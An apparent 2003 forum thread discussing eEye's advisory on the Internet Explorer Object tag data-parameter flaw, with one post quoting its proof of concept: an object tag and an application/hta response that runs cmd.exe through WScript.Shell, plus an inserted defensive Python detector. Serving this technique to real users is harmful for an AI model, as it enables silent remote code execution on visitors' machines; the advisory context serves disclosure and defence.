New Hole In M$ IE

  1. #1
    Senior Member
    Join Date
    May 2003
    Posts
    472

    New Hole In M$ IE

    Release Date: August 20, 2003

    Severity: High (Remote Code Execution)

    Systems Affected:

    Microsoft Internet Explorer 5.01
    Microsoft Internet Explorer 5.5
    Microsoft Internet Explorer 6.0
    Microsoft Internet Explorer 6.0 for Windows Server 2003


    Description:

    eEye Digital Security has discovered a security vulnerability in Microsoft's Internet Explorer that would allow executable code to run automatically upon rendering malicious HTML.

    This is a flaw in Microsoft's primary contribution to HTML, the Object tag, which is used to embed basically all ActiveX into HTML pages. The parameter that specifies the remote location of data for objects is not checked to validate the nature of the file being loaded, and therefore trojan executables may be run from within a webpage as silently and as easily as Internet Explorer parses image files or any other "safe" HTML content.

    This attack may be utilized wherever IE parses HTML, including websites, email, newsgroups, and within applications utilizing web-browsing functionality.

    Note:

    On Windows 2003 Internet Explorer, this vulnerability is noted as being "moderate" rather than "critical." This is because of Windows 2003's "Enhanced Security Configuration Mode", in which Microsoft sets the "Disable ActiveX" option in Internet Explorer's Security Properties by default. Windows 2003 Internet Explorer also disables by default: Visual Basic Script, Javascript, input forms, and the ability to download files.

    Due to the popularity and prevalence of ActiveX on the Internet, users running Windows 2003 "Enhanced Security Configuration" Mode may have chosen to reactivate the ability to view active content. These users should be aware that they are at critical risk for this vulnerability and should apply the necessary patch.

    As a final note, Microsoft attributes credit to eEye for this vulnerability, but incorrectly refers to it as the "Object Type" bug. The "Object Type" bug is in fact eEye's previously discovered object tag vulnerability. That issue involved a stack-based overflow in the "Type" property, and this current issue involves incorrect handling of the data specified by the "Data" tag.
    Source Here : http://www.zone-h.org/en/advisories/read/id=2913/

    M$ Patch Here : Microsoft was notified and has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/sec...n/MS03-032.asp
    guru@linux:~> who I grep -i blonde I talk; cd ~; wine; talk; touch; unzip; touch; strip; gasp; finger; mount; fsck; more; yes; gasp; umount; make clean; sleep;

  2. #2
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    don't forget the fun stuff

    Code:
    Technical Description:
    
    --------------Client HTTP request---------------------------
    <html>
    ...
    <object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
    </object>
    </html>
    ------------------------------------------------------------
    
    -------------Server HTTP Response---------------------------
    HTTP/1.1 200 OK
    Date: Tue, 13 May 2003 18:06:43 GMT
    Server: Apache
    Content-Type: application/hta
    Content-Length: 191
    
    <html>
    <object id='wsh'
    classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script>
    wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
    </script>
    </html>
    ------------------------------------------------------------
    yeah, I'm gonna need that by friday...
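
Seen from the defending side, the exchange in post #2 turns on the response header rather than the URL: the `data` URL ends in `.html`, but the server labels the body `application/hta`. The following is an added example (not from the thread or the eEye advisory) that pulls `<object data>` URLs out of a page and flags any whose captured response carries that type; the function names, the example.test hosts and the sample capture are constructed for illustration.

```python
import posixpath
from email.parser import Parser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Types handed to a script host rather than rendered. Only application/hta
# appears in the thread; the set is an assumption to extend locally.
ACTIVE_TYPES = {"application/hta"}

class ObjectDataCollector(HTMLParser):
    """Collect the data= URL of every <object> element."""
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        data = dict(attrs).get("data")
        if tag == "object" and data:
            self.urls.append(data)

def response_content_type(raw_response):
    """Media type (lower-cased, parameters dropped) from a raw response."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    header_block = head.split("\n", 1)[1] if "\n" in head else ""
    return Parser().parsestr(header_block, headersonly=True).get_content_type()

def flag_object_loads(page_html, responses):
    """Return (url, content_type, disguised) for each risky object load."""
    collector = ObjectDataCollector()
    collector.feed(page_html)
    findings = []
    for url in collector.urls:
        raw = responses.get(url)
        if raw is None:
            continue  # no captured response for this object
        ctype = response_content_type(raw)
        if ctype in ACTIVE_TYPES:
            # disguised: the URL extension does not announce an HTA
            ext = posixpath.splitext(urlparse(url).path)[1].lower()
            findings.append((url, ctype, ext != ".hta"))
    return findings

# Constructed sample: one benign object, one served as an HTA behind .html.
SAMPLE_PAGE = ('<html><object data="http://a.example.test/chart.html"></object>'
               '<object data="http://b.example.test/page.html"></object></html>')
SAMPLE_RESPONSES = {
    "http://a.example.test/chart.html":
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>",
    "http://b.example.test/page.html":
        "HTTP/1.1 200 OK\r\nContent-Type: Application/HTA\r\n\r\n<html></html>",
}
```

Calling `flag_object_loads(SAMPLE_PAGE, SAMPLE_RESPONSES)` returns only the second URL, marked as disguised because its path ends in `.html`.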

  3. #3
    Senior Member
    Join Date
    May 2003
    Posts
    472
    that would have made my post much longer... but this part is available in the link I have given...

    nJoy
    guru@linux:~> who I grep -i blonde I talk; cd ~; wine; talk; touch; unzip; touch; strip; gasp; finger; mount; fsck; more; yes; gasp; umount; make clean; sleep;

  4. #4
    Junior Member
    Join Date
    Jul 2003
    Posts
    26
    Actually, M$ just released a patch for XP home systems that should target that vulnerability. I haven't installed it on my system yet because well, we all know how irreputibly reliable M$ patches are.
    Release a bomb filled with Ritalin and Pharmacy death. Keep the rich above in the hills where the impact will not reach them. Then go for the ironic statement and call it a cure for pollution.

  5. #5
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    This is another reason why I haven't put my Windows box online in about a month now. Maybe after they release enough patches to actually fix this I will actually use it online. Between MSBlast and holes that would be enough to make a decent golf course I haven't put the XP box online in a while. The only box I've had online is this one which is Slackware, and a few days ago was FreeBSD. You'd think Microsoft would fix these or at least start making golf courses, a thing people actually want holes in.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  6. #6
    Member
    Join Date
    Nov 2002
    Posts
    80
    <rant> I noticed this show up as an update this morning I think. I wouldn't mind so much if IE wasn't tied into other programs that I use like MSN Messenger, why can't they use the default browser, long live Mozilla! </rant>
